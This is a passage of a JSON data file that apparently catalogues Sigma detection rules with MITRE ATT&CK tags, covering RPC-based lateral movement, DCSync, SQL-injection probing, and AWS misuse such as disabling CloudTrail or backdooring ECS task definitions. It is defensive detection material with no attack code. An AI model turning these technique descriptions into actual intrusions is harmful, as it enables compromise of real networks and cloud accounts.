"attack.t1053.002" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_atsvc_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", - "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", - "value": "Remote Schedule Task Recon via AtScv", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/01", - "filename": "rpc_firewall_atsvc_recon.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", - "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", - "value": "Possible DCSync Attack", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1033/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://github.com/zeronetworks/rpcfirewall", - 
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" - ], - "tags": [ - "attack.t1033" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_dcsync_attack.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", - "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", - "value": "Remote Encrypting File System Abuse", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_efs_abuse.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Legitimate usage of remote file encryption" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", - "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", - "value": "Remote Event Log Recon", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/01", - "filename": "rpc_firewall_eventlog_recon.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Remote administrative tasks on Windows Events" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task", - "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", - "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - "attack.t1053.002" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to read information about scheduled tasks", - "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", - "value": "Remote Schedule Task Recon via ITaskSchedulerService", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - 
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/01", - "filename": "rpc_firewall_itaskschedulerservice_recon.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", - "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", - "value": "Remote Printing Abuse for Lateral Movement", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_printing_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Actual 
printing" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", - "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", - "value": "Remote DCOM/WMI Lateral Movement", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1021/003/", - "https://attack.mitre.org/techniques/T1047/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.003", - "attack.t1047" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_dcom_or_wmi.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Some administrative tasks on remote host" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to modify the registry and possible execute code", - "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", - "value": "Remote Registry Lateral Movement", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1112/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_registry_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Remote administration of registry values" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to collect information", - "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", - "value": "Remote Registry Recon", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_registry_recon.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Remote administration of registry values" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", - "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", - "value": "Remote Server Service Abuse", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - 
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" - ], - "tags": [ - "attack.lateral_movement" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_server_service_abuse.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Legitimate remote share creation" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", - "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", - "value": "Remote Server Service Abuse for Lateral Movement", - "meta": { - "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1569/002/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1569.002" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_remote_service_lateral_movement.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Administrative tasks on remote services" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects remote RPC calls to create 
or execute a scheduled task via SASec",
- "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0",
- "value": "Remote Schedule Task Lateral Movement via SASec",
- "meta": {
- "refs": [
- "https://attack.mitre.org/techniques/T1053/",
- "https://attack.mitre.org/tactics/TA0008/",
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
- "https://github.com/zeronetworks/rpcfirewall",
- "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1053",
- "attack.t1053.002"
- ],
- "creation_date": "2022/01/01",
- "filename": "rpc_firewall_sasec_lateral_movement.yml",
- "author": "Sagie Dulce, Dekel Paz",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "application",
- "logsource.product": "rpc_firewall"
- }
- },
- {
- "description": "Detects remote RPC calls to read information about scheduled tasks via SASec",
- "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7",
- "value": "Recon Activity via SASec",
- "meta": {
- "refs": [
- "https://attack.mitre.org/tactics/TA0007/",
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931",
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md",
- "https://github.com/zeronetworks/rpcfirewall",
- "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2022/01/01",
- "filename": "rpc_firewall_sasec_recon.yml",
- "author": "Sagie Dulce, Dekel Paz",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "application",
- "logsource.product": "rpc_firewall"
- }
- },
- {
- "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.",
- "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5",
- "value": "SharpHound Recon Account Discovery",
- "meta": {
- "refs": [
- "https://attack.mitre.org/techniques/T1087/",
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3",
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md",
- "https://github.com/zeronetworks/rpcfirewall",
- "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml"
- ],
- "tags": [
- "attack.t1087"
- ],
- "creation_date": "2022/01/01",
- "filename": "rpc_firewall_sharphound_recon_account.yml",
- "author": "Sagie Dulce, Dekel Paz",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "application",
- "logsource.product": "rpc_firewall"
- }
- },
- {
- "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.",
- "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28",
- "value": "SharpHound Recon Sessions",
- "meta": {
- "refs": [
- "https://attack.mitre.org/techniques/T1033/",
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183",
- "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md",
- "https://github.com/zeronetworks/rpcfirewall",
- "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml"
- ],
- "tags": [
- "attack.t1033"
- ],
- "creation_date": "2022/01/01",
- "filename": "rpc_firewall_sharphound_recon_sessions.yml",
- "author": "Sagie Dulce, Dekel Paz",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "application",
- "logsource.product": "rpc_firewall"
- }
- },
- {
- "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts",
- "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a",
- "value": "Ruby on Rails Framework Exceptions",
- "meta": {
- "refs": [
- "http://edgeguides.rubyonrails.org/security.html",
- "http://guides.rubyonrails.org/action_controller_overview.html",
- "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception",
- "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2017/08/06",
- "filename": "appframework_ruby_on_rails_exceptions.yml",
- "author": "Thomas Patzke",
- "level": "medium",
- "falsepositive": [
- "Application bugs"
- ],
- "logsource.category": "application",
- "logsource.product": "ruby_on_rails"
- }
- },
- {
- "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts",
- "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33",
- "value": "Spring Framework Exceptions",
- "meta": {
- "refs": [
- "https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2017/08/06",
- "filename": "appframework_spring_exceptions.yml",
- "author": "Thomas Patzke",
- "level": "medium",
- "falsepositive": [
- "Application bugs"
- ],
- "logsource.category": "application",
- "logsource.product": "spring"
- }
- },
- {
- "description": "Detects SQL error messages that indicate probing for an injection attack",
- "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086",
- "value": "Suspicious SQL Error Messages",
- "meta": {
- "refs": [
- "http://www.sqlinjection.net/errors",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2017/11/27",
- "filename": "app_sqlinjection_errors.yml",
- "author": "Bjoern Kimminich",
- "level": "high",
- "falsepositive": [
- "Application bugs"
- ],
- "logsource.category": "application",
- "logsource.product": "sql"
- }
- },
- {
- "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n",
- "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d",
- "value": "AWS Attached Malicious Lambda Layer",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml"
- ],
- "tags": [
- "attack.privilege_escalation"
- ],
- "creation_date": "2021/09/23",
- "filename": "aws_attached_malicious_lambda_layer.yml",
- "author": "Austin Songer",
- "level": "medium",
- "falsepositive": [
- "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
- "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects disabling, deleting and updating of a Trail",
- "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74",
- "value": "AWS CloudTrail Important Change",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ],
- "creation_date": "2020/01/21",
- "filename": "aws_cloudtrail_disable_logging.yml",
- "author": "vitaliy0x1",
- "level": "medium",
- "falsepositive": [
- "Valid change in a Trail"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects AWS Config Service disabling",
- "uuid": "07330162-dba1-4746-8121-a9647d49d297",
- "value": "AWS Config Disabling Channel/Recorder",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ],
- "creation_date": "2020/01/21",
- "filename": "aws_config_disable_recording.yml",
- "author": "vitaliy0x1",
- "level": "high",
- "falsepositive": [
- "Valid change in AWS Config Service"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n",
- "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223",
- "value": "AWS EC2 Disable EBS Encryption",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1486",
- "attack.t1565"
- ],
- "creation_date": "2021/06/29",
- "filename": "aws_ec2_disable_encryption.yml",
- "author": "Sittikorn S",
- "level": "medium",
- "falsepositive": [
- "System Administrator Activities",
- "DEV, UAT, SAT environment. You should apply this rule with PROD account only."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.",
- "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c",
- "value": "AWS EC2 Download Userdata",
- "meta": {
- "refs": [
- "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1020"
- ],
- "creation_date": "2020/02/11",
- "filename": "aws_ec2_download_userdata.yml",
- "author": "faloker",
- "level": "medium",
- "falsepositive": [
- "Assets management software like device42"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.",
- "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df",
- "value": "AWS EC2 Startup Shell Script Change",
- "meta": {
- "refs": [
- "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.t1059.003",
- "attack.t1059.004"
- ],
- "creation_date": "2020/02/12",
- "filename": "aws_ec2_startup_script_change.yml",
- "author": "faloker",
- "level": "high",
- "falsepositive": [
- "Valid changes to the startup script"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.",
- "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b",
- "value": "AWS EC2 VM Export Failure",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1005",
- "attack.exfiltration",
- "attack.t1537"
- ],
- "creation_date": "2020/04/16",
- "filename": "aws_ec2_vm_export_failure.yml",
- "author": "Diogo Braz",
- "level": "low",
- "falsepositive": "No established falsepositives",
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment.\n",
- "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad",
- "value": "AWS ECS Backdoor Task Definition",
- "meta": {
- "refs": [
- "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py",
- "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html",
- "https://attack.mitre.org/techniques/T1525",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1525"
- ],
- "creation_date": "2022/06/07",
- "filename": "aws_ecs_task_definition_backdoor.yml",
- "author": "Darin Smith",
- "level": "medium",
- "falsepositive": [
- "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n",
- "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef",
- "value": "AWS EFS Fileshare Modified or Deleted",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml"
- ],
- "tags": [
- "attack.impact"
- ],
- "creation_date": "2021/08/15",
- "filename": "aws_efs_fileshare_modified_or_deleted.yml",
- "author": "Austin Songer @austinsonger",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.",
- "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964",
- "value": "AWS EFS Fileshare Mount Modified or Deleted",
- "meta": {
- "refs": [
- "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1485"
- ],
- "creation_date": "2021/08/15",
- "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml",
- "author": "Austin Songer @austinsonger",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Identifies when an EKS cluster is created or deleted.",
- "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0",
- "value": "AWS EKS Cluster Created or Deleted",
- "meta": {
- "refs": [
- "https://any-api.com/amazonaws_com/eks/docs/API_Description",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1485"
- ],
- "creation_date": "2021/08/16",
- "filename": "aws_eks_cluster_created_or_deleted.yml",
- "author": "Austin Songer",
- "level": "low",
- "falsepositive": [
- "EKS Cluster being created or deleted may be performed by a system administrator.",
- "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
- "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
- ],
- "logsource.category": "No established category",
- "logsource.product": "aws"
- }
- },
- {
- "description": "Detects when an ElastiCache security group has been created.",
- "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7",
- "value": "AWS ElastiCache Security Group Created",
- "meta": {
